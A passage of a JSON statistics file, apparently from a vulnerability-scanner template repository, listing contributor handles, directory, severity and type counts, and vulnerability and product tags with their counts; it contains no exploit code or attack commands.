splint3r7","count":2},{"name":"cocxanh","count":2},{"name":"dheerajmadhukar","count":2},{"name":"ambassify","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"bananabr","count":2},{"name":"pxmme1337","count":2},{"name":"ree4pwn","count":2},{"name":"taielab","count":2},{"name":"swissky","count":2},{"name":"0xprial","count":2},{"name":"x1m_martijn","count":2},{"name":"w4cky_","count":2},{"name":"lotusdll","count":2},{"name":"0xelkomy","count":2},{"name":"bsysop","count":2},{"name":"udit_thakkur","count":2},{"name":"bp0lr","count":2},{"name":"paradessia","count":2},{"name":"0xsapra","count":2},{"name":"foulenzer","count":2},{"name":"nkxxkn","count":2},{"name":"vavkamil","count":2},{"name":"gal nagli","count":2},{"name":"revblock","count":1},{"name":"mah3sec_","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"osamahamad","count":1},{"name":"schniggie","count":1},{"name":"deena","count":1},{"name":"pratik khalane","count":1},{"name":"ola456","count":1},{"name":"rodnt","count":1},{"name":"yashgoti","count":1},{"name":"sec_hawk","count":1},{"name":"alexrydzak","count":1},{"name":"soyelmago","count":1},{"name":"evan rubinstien","count":1},{"name":"juicypotato1","count":1},{"name":"thebinitghimire","count":1},{"name":"infosecsanyam","count":1},{"name":"xstp","count":1},{"name":"igibanez","count":1},{"name":"francescocarlucci","count":1},{"name":"exceed","count":1},{"name":"x6263","count":1},{"name":"0ut0fb4nd","count":1},{"name":"sshell","count":1},{"name":"shreyapohekar","count":1},{"name":"_darrenmartyn","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"hakluke","count":1},{"name":"patralos","count":1},{"name":"wabafet","count":1},{"name":"majidmc2","count":1},{"name":"0xd0ff9","count":1},{"name":"2rs3c","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"berkdusunur","count":1},{"name":"bad5ect0r","count":1},{"name":"harshinsecurity","count":1},{"name":"b0rn2r00t","count":1},{"name":"furkansenan","count":1},{"name":"p-l-","count":1},{"name":"absshax","count":1},{"name":"lethargynavigator","count":1},{"name":"breno_css","count":1},{"name":"fopina","count":1},{"name":"0xteles","count":1},{"name":"ohlinge","count":1},{"name":"cookiehanhoan","count":1},{"name":"rubina119","count":1},{"name":"ph33r","count":1},{"name":"phyr3wall","count":1},{"name":"zsusac","count":1},{"name":"prettyboyaaditya","count":1},{"name":"jeya seelan","count":1},{"name":"sherlocksecurity","count":1},{"name":"adrianmf","count":1},{"name":"retr0","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"0xtavian","count":1},{"name":"noobexploiter","count":1},{"name":"myztique","count":1},{"name":"ringo","count":1},{"name":"omarkurt","count":1},{"name":"charanrayudu","count":1},{"name":"zhenwarx","count":1},{"name":"th3.d1p4k","count":1},{"name":"xshuden","count":1},{"name":"oscarintherocks","count":1},{"name":"whynotke","count":1},{"name":"amnotacat","count":1},{"name":"opencirt","count":1},{"name":"dievus","count":1},{"name":"ofjaaah","count":1},{"name":"thezakman","count":1},{"name":"notsoevilweasel","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"brabbit10","count":1},{"name":"dawid-czarnecki","count":1},{"name":"udyz","count":1},{"name":"hanlaomo","count":1},{"name":"qlkwej","count":1},{"name":"jas37","count":1},{"name":"remonsec","count":1},{"name":"narluin","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"daffianfo","count":1},{"name":"act1on3","count":1},{"name":"akshansh","count":1},{"name":"thevillagehacker","count":1},{"name":"affix","count":1},{"name":"jeya.seelan","count":1},{"name":"push4d","count":1},{"name":"v0idc0de","count":1},{"name":"d0rkerdevil","count":1},{"name":"orpheus","count":1},{"name":"justmumu","count":1},{"name":"apt-mirror","count":1},{"name":"arr0way","count":1},{"name":"c3l3si4n","count":1},{"name":"prajiteshsingh","count":1},{"name":"pudsec","count":1},{"name":"luskabol","count":1},{"name":"petruknisme","count":1},{"name":"kaizensecurity","count":1},{"name":"makyotox","count":1},{"name":"mesaglio","count":1},{"name":"d4vy","count":1},{"name":"ooooooo_q","count":1},{"name":"toufik-airane","count":1},{"name":"exploitation","count":1},{"name":"_harleo","count":1},{"name":"clment cruchet","count":1},{"name":"kabirsuda","count":1},{"name":"intx0x80","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"0xrod","count":1},{"name":"xeldax","count":1},{"name":"3th1c_yuk1","count":1},{"name":"duty_1g","count":1},{"name":"shelld3v","count":1},{"name":"kurohost","count":1},{"name":"tirtha","count":1},{"name":"s1r1u5_","count":1},{"name":"luqmaan hadia","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"yashanand155","count":1},{"name":"rschio","count":1},{"name":"kailashbohara","count":1},{"name":"alevsk","count":1},{"name":"miroslavsotak","count":1},{"name":"tim_koopmans","count":1},{"name":"jrolf","count":1},{"name":"un-fmunozs","count":1},{"name":"daviey","count":1},{"name":"kiks7","count":1},{"name":"philippdelteil","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"tea","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"akash.c","count":1},{"name":"kareemse1im","count":1},{"name":"jteles","count":1},{"name":"compr00t","count":1},{"name":"0xceeb","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"luqman","count":1},{"name":"manuelbua","count":1},{"name":"0xh7ml","count":1},{"name":"noamrathaus","count":1},{"name":"andirrahmani1","count":1},{"name":"mrcl0wnlab","count":1},{"name":"nerrorsec","count":1},{"name":"f1she3","count":1},{"name":"b0yd","count":1},{"name":"yuansec","count":1},{"name":"jbaines-r7","count":1},{"name":"elmahdi","count":1},{"name":"mhdsamx","count":1},{"name":"aresx","count":1},{"name":"micha3lb3n","count":1},{"name":"_c0wb0y_","count":1},{"name":"aaronchen0","count":1},{"name":"bartu utku sarp","count":1},{"name":"florianmaak","count":1},{"name":"nytr0gen","count":1},{"name":"sickwell","count":1},{"name":"momen eldawakhly","count":1},{"name":"lark lab","count":1},{"name":"ilovebinbash","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"bjhulst","count":1},{"name":"ahmed sherif","count":1},{"name":"geraldino2","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"andysvints","count":1},{"name":"ldionmarcil","count":1},{"name":"j33n1k4","count":1},{"name":"shifacyclewla","count":1},{"name":"thesubtlety","count":1},{"name":"arall","count":1},{"name":"skylark-lab","count":1},{"name":"clarkvoss","count":1},{"name":"streetofhackerr007","count":1},{"name":"rojanrijal","count":1},{"name":"retr02332","count":1},{"name":"husain","count":1},{"name":"ok_bye_now","count":1},{"name":"exid","count":1},{"name":"elouhi","count":1},{"name":"official_blackhat13","count":1},{"name":"alex","count":1},{"name":"nielsing","count":1},{"name":"chron0x","count":1},{"name":"fmunozs","count":1},{"name":"ggranjus","count":1},{"name":"gboddin","count":1},{"name":"ipanda","count":1},{"name":"evolutionsec","count":1},{"name":"borna nematzadeh","count":1},{"name":"sicksec","count":1},{"name":"pdp","count":1},{"name":"dhiyaneshdki","count":1},{"name":"mass0ma","count":1},{"name":"furkansayim","count":1},{"name":"0xceba","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"izn0u","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"alperenkesk","count":1},{"name":"undefl0w","count":1},{"name":"becivells","count":1},{"name":"flag007","count":1},{"name":"fq_hsu","count":1},{"name":"ahmetpergamum","count":1},{"name":"coldfish","count":1},{"name":"zandros0","count":1},{"name":"willd96","count":1},{"name":"elder tao","count":1},{"name":"anon-artist","count":1},{"name":"knassar702","count":1},{"name":"0h1in9e","count":1},{"name":"blckraven","count":1},{"name":"hexcat","count":1},{"name":"rotemreiss","count":1},{"name":"tirtha_mandal","count":1},{"name":"ahmed abou-ela","count":1},{"name":"bughuntersurya","count":1},{"name":"jiheon-dev","count":1},{"name":"iampritam","count":1},{"name":"brenocss","count":1},{"name":"korteke","count":1},{"name":"co0nan","count":1},{"name":"regala_","count":1},{"name":"0ri2n","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"droberson","count":1},{"name":"b4uh0lz","count":1},{"name":"zinminphy0","count":1},{"name":"vzamanillo","count":1},{"name":"mubassirpatel","count":1},{"name":"manasmbellani","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"yavolo","count":1},{"name":"notnotnotveg","count":1},{"name":"wlayzz","count":1}],"directory":[{"name":"cves","count":1160},{"name":"exposed-panels","count":523},{"name":"vulnerabilities","count":452},{"name":"technologies","count":255},{"name":"exposures","count":204},{"name":"misconfiguration","count":197},{"name":"workflows","count":186},{"name":"token-spray","count":154},{"name":"default-logins","count":95},{"name":"file","count":68},{"name":"takeovers","count":67},{"name":"iot","count":38},{"name":"network","count":35},{"name":"miscellaneous","count":23},{"name":"cnvd","count":22},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1192},{"name":"high","count":874},{"name":"medium","count":662},{"name":"critical","count":414},{"name":"low","count":183},{"name":"unknown","count":6}],"types":[{"name":"http","count":3187},{"name":"file","count":68},{"name":"network","count":50},{"name":"dns","count":17}]}
+{"tags":[{"name":"cve","count":1430},{"name":"panel","count":655},{"name":"edb","count":563},{"name":"lfi","count":509},{"name":"xss","count":491},{"name":"wordpress","count":419},{"name":"exposure","count":407},{"name":"cve2021","count":352},{"name":"rce","count":337},{"name":"wp-plugin","count":316},{"name":"tech","count":295},{"name":"packetstorm","count":276},{"name":"token-spray","count":230},{"name":"cve2020","count":214},{"name":"wpscan","count":212},{"name":"","count":194},{"name":"cve2022","count":184},{"name":"unauth","count":158},{"name":"config","count":147},{"name":"cve2018","count":144},{"name":"kev","count":141},{"name":"cve2019","count":135},{"name":"wp","count":134},{"name":"joomla","count":133},{"name":"apache","count":123},{"name":"default-login","count":118},{"name":"iot","count":116},{"name":"oast","count":112},{"name":"cve2010","count":111},{"name":"misconfig","count":107},{"name":"sqli","count":95},{"name":"authenticated","count":90},{"name":"login","count":87},{"name":"redirect","count":87},{"name":"router","count":84},{"name":"takeover","count":74},{"name":"token","count":72},{"name":"devops","count":71},{"name":"ssrf","count":69},{"name":"cve2017","count":67},{"name":"file","count":60},{"name":"auth-bypass","count":59},{"name":"oracle","count":57},{"name":"intrusive","count":56},{"name":"network","count":55},{"name":"cms","count":55},{"name":"disclosure","count":53},{"name":"seclists","count":51},{"name":"cve2016","count":48},{"name":"cisco","count":47},{"name":"cve2015","count":46},{"name":"google","count":46},{"name":"fileupload","count":44},{"name":"plugin","count":41},{"name":"cve2014","count":41},{"name":"adobe","count":40},{"name":"oss","count":39},{"name":"aem","count":36},{"name":"vulhub","count":36},{"name":"logs","count":36},{"name":"vmware","count":35},{"name":"traversal","count":35},{"name":"atlassian","count":34},{"name":"tenable","count":33},{"name":"injection","count":33},{"name":"listing","count":31},{"name":"hackerone","count":31},{"name":"jira","count":31},{"name":"springboot","count":28},{"name":"generic","count":28},{"name":"dns","count":27},{"name":"kubernetes","count":27},{"name":"huntr","count":27},{"name":"sap","count":25},{"name":"cnvd","count":25},{"name":"log4j","count":25},{"name":"microsoft","count":23},{"name":"proxy","count":23},{"name":"debug","count":22},{"name":"jndi","count":22},{"name":"wp-theme","count":21},{"name":"manageengine","count":21},{"name":"zoho","count":21},{"name":"misc","count":21},{"name":"cve2012","count":20},{"name":"aws","count":20},{"name":"fuzz","count":20},{"name":"weblogic","count":19},{"name":"tomcat","count":19},{"name":"php","count":19},{"name":"deserialization","count":19},{"name":"api","count":18},{"name":"ibm","count":18},{"name":"k8s","count":18},{"name":"camera","count":18},{"name":"dlink","count":18},{"name":"service","count":18},{"name":"jenkins","count":17},{"name":"cloud","count":17},{"name":"wavlink","count":17},{"name":"cicd","count":16},{"name":"struts","count":16},{"name":"xxe","count":15},{"name":"cve2011","count":15},{"name":"gitlab","count":15},{"name":"firewall","count":15},{"name":"cve2009","count":15},{"name":"domainmod","count":14},{"name":"hp","count":14},{"name":"printer","count":14},{"name":"java","count":14},{"name":"android","count":14},{"name":"ruijie","count":13},{"name":"cve2013","count":13},{"name":"abstractapi","count":13},{"name":"msf","count":13},{"name":"lfr","count":13},{"name":"status","count":12},{"name":"magento","count":12},{"name":"netgear","count":12},{"name":"drupal","count":12},{"name":"netsweeper","count":12},{"name":"graphql","count":12},{"name":"ftp","count":12},{"name":"confluence","count":12},{"name":"rails","count":12},{"name":"nginx","count":12},{"name":"glpi","count":11},{"name":"cnvd2021","count":11},{"name":"cisa","count":11},{"name":"amazon","count":11},{"name":"azure","count":11},{"name":"microweber","count":11},{"name":"airflow","count":11},{"name":"cve2008","count":11},{"name":"backup","count":11},{"name":"woocommerce","count":11},{"name":"grafana","count":10},{"name":"github","count":10},{"name":"jolokia","count":10},{"name":"spring","count":10},{"name":"dell","count":10},{"name":"coldfusion","count":10},{"name":"fortigate","count":10},{"name":"zyxel","count":10},{"name":"django","count":10},{"name":"backdoor","count":9},{"name":"iis","count":9},{"name":"fastjson","count":9},{"name":"wso2","count":9},{"name":"mirai","count":9},{"name":"laravel","count":9},{"name":"windows","count":9},{"name":"vcenter","count":9},{"name":"webserver","count":9},{"name":"ruby","count":9},{"name":"kube","count":9},{"name":"dedecms","count":9},{"name":"phpmyadmin","count":9},{"name":"prometheus","count":9},{"name":"auth","count":9},{"name":"zabbix","count":9},{"name":"fortinet","count":9},{"name":"vpn","count":8},{"name":"cisco-switch","count":8},{"name":"scada","count":8},{"name":"sonicwall","count":8},{"name":"recon","count":8},{"name":"git","count":8},{"name":"jboss","count":8},{"name":"config-audit","count":8},{"name":"citrix","count":8},{"name":"ssti","count":8},{"name":"metadata","count":8},{"name":"headless","count":8},{"name":"zimbra","count":8},{"name":"kafka","count":8},{"name":"elasticsearch","count":8},{"name":"blind","count":8},{"name":"audit","count":8},{"name":"solr","count":8},{"name":"ssl","count":8},{"name":"cnvd2020","count":7},{"name":"exchange","count":7},{"name":"mail","count":7},{"name":"python","count":7},{"name":"firebase","count":7},{"name":"jetbrains","count":7},{"name":"icewarp","count":7},{"name":"solarview","count":7},{"name":"druid","count":7},{"name":"bucket","count":7},{"name":"files","count":7},{"name":"symfony","count":7},{"name":"maps","count":7},{"name":"docker","count":7},{"name":"squirrelmail","count":7},{"name":"samsung","count":6},{"name":"jetty","count":6},{"name":"fpd","count":6},{"name":"setup","count":6},{"name":"artica","count":6},{"name":"ecology","count":6},{"name":"go","count":6},{"name":"ognl","count":6},{"name":"bypass","count":6},{"name":"ofbiz","count":6},{"name":"crlf","count":6},{"name":"sitecore","count":6},{"name":"huawei","count":6},{"name":"zhiyuan","count":6},{"name":"rconfig","count":6},{"name":"kubelet","count":6},{"name":"cobbler","count":6},{"name":"slack","count":6},{"name":"enum","count":6},{"name":"bigip","count":6},{"name":"lucee","count":6},{"name":"npm","count":6},{"name":"nodejs","count":6},{"name":"seeyon","count":6},{"name":"magmi","count":6},{"name":"websphere","count":6},{"name":"liferay","count":6},{"name":"vms","count":6},{"name":"emerge","count":6},{"name":"firmware","count":5},{"name":"avideo","count":5},{"name":"elfinder","count":5},{"name":"cockpit","count":5},{"name":"solarwinds","count":5},{"name":"scan","count":5},{"name":"carrental","count":5},{"name":"apisix","count":5},{"name":"minio","count":5},{"name":"alibaba","count":5},{"name":"node","count":5},{"name":"storage","count":5},{"name":"opensis","count":5},{"name":"rfi","count":5},{"name":"ssh","count":5},{"name":"gogs","count":5},{"name":"plesk","count":5},{"name":"moodle","count":5},{"name":"circarlife","count":5},{"name":"thinkphp","count":5},{"name":"gocd","count":5},{"name":"fatpipe","count":5},{"name":"metinfo","count":5},{"name":"keycloak","count":5},{"name":"nagios","count":5},{"name":"symantec","count":5},{"name":"jamf","count":5},{"name":"leak","count":5},{"name":"error","count":5},{"name":"strapi","count":5},{"name":"cache","count":5},{"name":"74cms","count":5},{"name":"rseenet","count":5},{"name":"awstats","count":4},{"name":"xmlrpc","count":4},{"name":"resin","count":4},{"name":"gnuboard","count":4},{"name":"hpe","count":4},{"name":"oauth","count":4},{"name":"terramaster","count":4},{"name":"cacti","count":4},{"name":"sonarqube","count":4},{"name":"vrealize","count":4},{"name":"jellyfin","count":4},{"name":"telerik","count":4},{"name":"phpinfo","count":4},{"name":"hybris","count":4},{"name":"filemanager","count":4},{"name":"adminer","count":4},{"name":"search","count":4},{"name":"hashicorp","count":4},{"name":"phppgadmin","count":4},{"name":"install","count":4},{"name":"hikvision","count":4},{"name":"caucho","count":4},{"name":"flink","count":4},{"name":"yeswiki","count":4},{"name":"aspose","count":4},{"name":"database","count":4},{"name":"puppet","count":4},{"name":"wcs","count":4},{"name":"kevinlab","count":4},{"name":"vbulletin","count":4},{"name":"panos","count":4},{"name":"telesquare","count":4},{"name":"hoteldruid","count":4},{"name":"hongdian","count":4},{"name":"beyondtrust","count":4},{"name":"sql","count":4},{"name":"photo","count":4},{"name":"mailchimp","count":4},{"name":"asp","count":4},{"name":"stripe","count":4},{"name":"cnvd2019","count":4},{"name":"royalevent","count":4},{"name":"activemq","count":4},{"name":"couchdb","count":4},{"name":"mongodb","count":4},{"name":"springcloud","count":4},{"name":"kibana","count":4},{"name":"elastic","count":4},{"name":"sangfor","count":4},{"name":"smtp","count":4},{"name":"voip","count":4},{"name":"thinkcmf","count":4},{"name":"tikiwiki","count":4},{"name":"db","count":4},{"name":"parallels","count":4},{"name":"sophos","count":4},{"name":"cve2007","count":4},{"name":"redis","count":4},{"name":"redmine","count":4},{"name":"horde","count":4},{"name":"nexus","count":4},{"name":"paypal","count":4},{"name":"roxy","count":4},{"name":"openemr","count":4},{"name":"oa","count":4},{"name":"prestashop","count":4},{"name":"artifactory","count":4},{"name":"postmessage","count":4},{"name":"microstrategy","count":4},{"name":"ems","count":4},{"name":"servicenow","count":3},{"name":"ivanti","count":3},{"name":"webmail","count":3},{"name":"sendgrid","count":3},{"name":"lansweeper","count":3},{"name":"tenda","count":3},{"name":"messaging","count":3},{"name":"splunk","count":3},{"name":"targa","count":3},{"name":"linkerd","count":3},{"name":"ec2","count":3},{"name":"zte","count":3},{"name":"drawio","count":3},{"name":"hsphere","count":3},{"name":"umbraco","count":3},{"name":"buffalo","count":3},{"name":"elementor","count":3},{"name":"intercom","count":3},{"name":"netlify","count":3},{"name":"thruk","count":3},{"name":"kingsoft","count":3},{"name":"synology","count":3},{"name":"sharepoint","count":3},{"name":"glassfish","count":3},{"name":"samba","count":3},{"name":"mcafee","count":3},{"name":"microfocus","count":3},{"name":"bruteforce","count":3},{"name":"digitalocean","count":3},{"name":"r-seenet","count":3},{"name":"kentico","count":3},{"name":"digitalrebar","count":3},{"name":"aptus","count":3},{"name":"circleci","count":3},{"name":"prtg","count":3},{"name":"linksys","count":3},{"name":"selea","count":3},{"name":"nuuo","count":3},{"name":"sugarcrm","count":3},{"name":"omnia","count":3},{"name":"graylog","count":3},{"name":"nacos","count":3},{"name":"globalprotect","count":3},{"name":"pip","count":3},{"name":"trendnet","count":3},{"name":"webadmin","count":3},{"name":"cve2005","count":3},{"name":"panabit","count":3},{"name":"jfrog","count":3},{"name":"httpd","count":3},{"name":"fortios","count":3},{"name":"exposures","count":3},{"name":"dotcms","count":3},{"name":"netdata","count":3},{"name":"epson","count":3},{"name":"wordfence","count":3},{"name":"consul","count":3},{"name":"heroku","count":3},{"name":"thinfinity","count":3},{"name":"metabase","count":3},{"name":"s3","count":3},{"name":"kkfileview","count":3},{"name":"openbmcs","count":3},{"name":"smb","count":3},{"name":"axis2","count":3},{"name":"nosqli","count":3},{"name":"workspaceone","count":3},{"name":"blockchain","count":3},{"name":"ampps","count":3},{"name":"log","count":3},{"name":"lotus","count":3},{"name":"sentry","count":3},{"name":"bigant","count":3},{"name":"rackn","count":3},{"name":"bitrix","count":3},{"name":"matrix","count":3},{"name":"axis","count":3},{"name":"rlm","count":3},{"name":"centos","count":3},{"name":"openam","count":3},{"name":"geowebserver","count":3},{"name":"grav","count":3},{"name":"actuator","count":3},{"name":"empirecms","count":3},{"name":"jeesns","count":3},{"name":"teamcity","count":3},{"name":"subrion","count":3},{"name":"voipmonitor","count":3},{"name":"geoserver","count":3},{"name":"concrete","count":3},{"name":"weiphp","count":3},{"name":"axigen","count":3},{"name":"fileman","count":3},{"name":"tableau","count":3},{"name":"pentaho","count":3},{"name":"movable","count":3},{"name":"ebs","count":3},{"name":"httpbin","count":3},{"name":"dom","count":3},{"name":"dolibarr","count":3},{"name":"mobileiron","count":3},{"name":"javascript","count":3},{"name":"dreambox","count":3},{"name":"nortek","count":3},{"name":"facebook","count":3},{"name":"square","count":3},{"name":"zeroshell","count":3},{"name":"octobercms","count":3},{"name":"mongo","count":3},{"name":"seagate","count":3},{"name":"odoo","count":3},{"name":"jupyter","count":3},{"name":"technology","count":3},{"name":"modem","count":3},{"name":"finecms","count":3},{"name":"graph","count":3},{"name":"3cx","count":3},{"name":"trixbox","count":3},{"name":"fanruan","count":3},{"name":"goanywhere","count":3},{"name":"fuelcms","count":3},{"name":"dzzoffice","count":3},{"name":"cloudflare","count":3},{"name":"getsimple","count":3},{"name":"netis","count":2},{"name":"nextjs","count":2},{"name":"phpstorm","count":2},{"name":"hubspot","count":2},{"name":"ericsson","count":2},{"name":"iptime","count":2},{"name":"impresscms","count":2},{"name":"books","count":2},{"name":"netsus","count":2},{"name":"avaya","count":2},{"name":"openssh","count":2},{"name":"appcms","count":2},{"name":"mbean","count":2},{"name":"netscaler","count":2},{"name":"servicedesk","count":2},{"name":"livezilla","count":2},{"name":"dubbo","count":2},{"name":"eris","count":2},{"name":"xoops","count":2},{"name":"influxdb","count":2},{"name":"virtua","count":2},{"name":"hasura","count":2},{"name":"erxes","count":2},{"name":"kavita","count":2},{"name":"justwriting","count":2},{"name":"couchbase","count":2},{"name":"typo3","count":2},{"name":"conductor","count":2},{"name":"linkedin","count":2},{"name":"xweb500","count":2},{"name":"seacms","count":2},{"name":"seeddms","count":2},{"name":"rocketchat","count":2},{"name":"intellian","count":2},{"name":"jeedom","count":2},{"name":"pascom","count":2},{"name":"teampass","count":2},{"name":"supermicro","count":2},{"name":"wooyun","count":2},{"name":"j2ee","count":2},{"name":"mantisbt","count":2},{"name":"rosariosis","count":2},{"name":"pmb","count":2},{"name":"natshell","count":2},{"name":"froxlor","count":2},{"name":"scriptcase","count":2},{"name":"webcam","count":2},{"name":"syslog","count":2},{"name":"seowon","count":2},{"name":"password","count":2},{"name":"wuzhicms","count":2},{"name":"waf","count":2},{"name":"contao","count":2},{"name":"redhat","count":2},{"name":"payara","count":2},{"name":"weather","count":2},{"name":"virtualui","count":2},{"name":"gophish","count":2},{"name":"xceedium","count":2},{"name":"mailgun","count":2},{"name":"homematic","count":2},{"name":"backups","count":2},{"name":"xerox","count":2},{"name":"globaldomains","count":2},{"name":"listserv","count":2},{"name":"rabbitmq","count":2},{"name":"commax","count":2},{"name":"akamai","count":2},{"name":"atmail","count":2},{"name":"nasos","count":2},{"name":"clansphere","count":2},{"name":"traefik","count":2},{"name":"aviatrix","count":2},{"name":"csrf","count":2},{"name":"rstudio","count":2},{"name":"rundeck","count":2},{"name":"chamilo","count":2},{"name":"dos","count":2},{"name":"hiveos","count":2},{"name":"ilo","count":2},{"name":"xsuite","count":2},{"name":"tileserver","count":2},{"name":"node-red-dashboard","count":2},{"name":"gitbook","count":2},{"name":"oidc","count":2},{"name":"arcgis","count":2},{"name":"ixcache","count":2},{"name":"chiyu","count":2},{"name":"wamp","count":2},{"name":"craftcms","count":2},{"name":"kettle","count":2},{"name":"unifi","count":2},{"name":"livehelperchat","count":2},{"name":"veeam","count":2},{"name":"showdoc","count":2},{"name":"zend","count":2},{"name":"dvwa","count":2},{"name":"ghost","count":2},{"name":"audiocodes","count":2},{"name":"yapi","count":2},{"name":"cyberoam","count":2},{"name":"owasp","count":2},{"name":"labkey","count":2},{"name":"openvpn","count":2},{"name":"chyrp","count":2},{"name":"h3c","count":2},{"name":"redash","count":2},{"name":"eventum","count":2},{"name":"angular","count":2},{"name":"bomgar","count":2},{"name":"ebook","count":2},{"name":"electron","count":2},{"name":"plastic","count":2},{"name":"igs","count":2},{"name":"otobo","count":2},{"name":"openresty","count":2},{"name":"wpqa","count":2},{"name":"text","count":2},{"name":"pulse","count":2},{"name":"hjtcloud","count":2},{"name":"pfsense","count":2},{"name":"landesk","count":2},{"name":"dotnetnuke","count":2},{"name":"fiori","count":2},{"name":"auerswald","count":2},{"name":"avantfax","count":2},{"name":"swagger","count":2},{"name":"gespage","count":2},{"name":"vidyo","count":2},{"name":"openwrt","count":2},{"name":"reolink","count":2},{"name":"loytec","count":2},{"name":"acrolinx","count":2},{"name":"forum","count":2},{"name":"circontrol","count":2},{"name":"favicon","count":2},{"name":"kong","count":2},{"name":"apollo","count":2},{"name":"resourcespace","count":2},{"name":"gitlist","count":2},{"name":"smartstore","count":2},{"name":"harbor","count":2},{"name":"saltstack","count":2},{"name":"flir","count":2},{"name":"cloudinary","count":2},{"name":"pcoip","count":2},{"name":"lighttpd","count":2},{"name":"sidekiq","count":2},{"name":"osticket","count":2},{"name":"checkpoint","count":2},{"name":"accela","count":2},{"name":"ranger","count":2},{"name":"phpcollab","count":2},{"name":"forcepoint","count":2},{"name":"airtame","count":2},{"name":"cgi","count":2},{"name":"neos","count":2},{"name":"konga","count":2},{"name":"watchguard","count":2},{"name":"azkaban","count":2},{"name":"f5","count":2},{"name":"eyesofnetwork","count":2},{"name":"qnap","count":2},{"name":"ametys","count":2},{"name":"itop","count":2},{"name":"avtech","count":2},{"name":"hostheader-injection","count":2},{"name":"pbootcms","count":2},{"name":"skycaiji","count":2},{"name":"ecoa","count":2},{"name":"docs","count":2},{"name":"ucmdb","count":2},{"name":"nextcloud","count":2},{"name":"hadoop","count":2},{"name":"middleware","count":2},{"name":"sqlite","count":2},{"name":"eprints","count":2},{"name":"dynamicweb","count":2},{"name":"cocoon","count":2},{"name":"domxss","count":2},{"name":"twitter","count":2},{"name":"gitea","count":2},{"name":"phpshowtime","count":2},{"name":"terraform","count":2},{"name":"mida","count":2},{"name":"wwbn","count":2},{"name":"sequoiadb","count":2},{"name":"glances","count":2},{"name":"flightpath","count":2},{"name":"tidb","count":2},{"name":"octoprint","count":2},{"name":"pam","count":2},{"name":"uwsgi","count":2},{"name":"hms","count":2},{"name":"corebos","count":2},{"name":"horizon","count":2},{"name":"graphite","count":2},{"name":"mysql","count":2},{"name":"xxljob","count":2},{"name":"carel","count":2},{"name":"fastcgi","count":2},{"name":"alienvault","count":2},{"name":"orchid","count":2},{"name":"vigorconnect","count":2},{"name":"maian","count":2},{"name":"tapestry","count":2},{"name":"jsf","count":2},{"name":"embed","count":2},{"name":"frp","count":2},{"name":"linux","count":2},{"name":"tongda","count":2},{"name":"aruba","count":2},{"name":"projectsend","count":2},{"name":"rockmongo","count":2},{"name":"codeigniter","count":2},{"name":"pega","count":2},{"name":"idor","count":2},{"name":"idrac","count":2},{"name":"jquery","count":2},{"name":"versa","count":2},{"name":"idea","count":2},{"name":"xampp","count":2},{"name":"rackstation","count":2},{"name":"jmx","count":2},{"name":"shellshock","count":2},{"name":"motorola","count":2},{"name":"key","count":2},{"name":"pacsone","count":2},{"name":"casdoor","count":2},{"name":"webalizer","count":2},{"name":"gryphon","count":2},{"name":"qcubed","count":2},{"name":"jitsi","count":2},{"name":"emqx","count":2},{"name":"wildfly","count":2},{"name":"fortiweb","count":2},{"name":"openstack","count":2},{"name":"sdwan","count":2},{"name":"draytek","count":2},{"name":"qihang","count":2},{"name":"emby","count":2},{"name":"webmin","count":2},{"name":"overflow","count":2},{"name":"places","count":2},{"name":"gradle","count":2},{"name":"zerof","count":2},{"name":"ambari","count":2},{"name":"cve2006","count":2},{"name":"dvr","count":2},{"name":"dotnet","count":2},{"name":"akkadian","count":2},{"name":"zms","count":2},{"name":"sas","count":2},{"name":"clusterengine","count":2},{"name":"bmc","count":2},{"name":"kiwitcms","count":2},{"name":"zblogphp","count":2},{"name":"ansible","count":2},{"name":"rancher","count":2},{"name":"upload","count":2},{"name":"sysaid","count":2},{"name":"yii","count":2},{"name":"ad","count":2},{"name":"pgadmin","count":2},{"name":"lantronix","count":2},{"name":"ubnt","count":2},{"name":"viewpoint","count":2},{"name":"guacamole","count":2},{"name":"mybb","count":2},{"name":"avada","count":2},{"name":"adiscon","count":2},{"name":"javamelody","count":2},{"name":"cas","count":2},{"name":"sniplets","count":2},{"name":"yonyou","count":2},{"name":"apereo","count":2},{"name":"myfactory","count":2},{"name":"frontpage","count":2},{"name":"zzzcms","count":2},{"name":"shenyu","count":2},{"name":"openfire","count":2},{"name":"spark","count":2},{"name":"synopsys","count":2},{"name":"metersphere","count":2},{"name":"ovirt","count":2},{"name":"alfresco","count":2},{"name":"netflix","count":2},{"name":"secret","count":2},{"name":"fortimail","count":2},{"name":"code42","count":2},{"name":"bigbluebutton","count":2},{"name":"proftpd","count":2},{"name":"bitly","count":2},{"name":"ruckus","count":2},{"name":"totemomail","count":2},{"name":"highmail","count":2},{"name":"exacqvision","count":2},{"name":"detect","count":2},{"name":"kafdrop","count":2},{"name":"zywall","count":2},{"name":"liquibase","count":1},{"name":"pihole","count":1},{"name":"fedora","count":1},{"name":"mediacloud","count":1},{"name":"ilch","count":1},{"name":"stridercd","count":1},{"name":"fudforum","count":1},{"name":"event","count":1},{"name":"phpok","count":1},{"name":"gilacms","count":1},{"name":"learnpress","count":1},{"name":"rainloop","count":1},{"name":"eyoumail","count":1},{"name":"zarafa","count":1},{"name":"3com","count":1},{"name":"b2evolution","count":1},{"name":"stored","count":1},{"name":"teltonika","count":1},{"name":"piluscart","count":1},{"name":"bonita","count":1},{"name":"formcraft3","count":1},{"name":"cliniccases","count":1},{"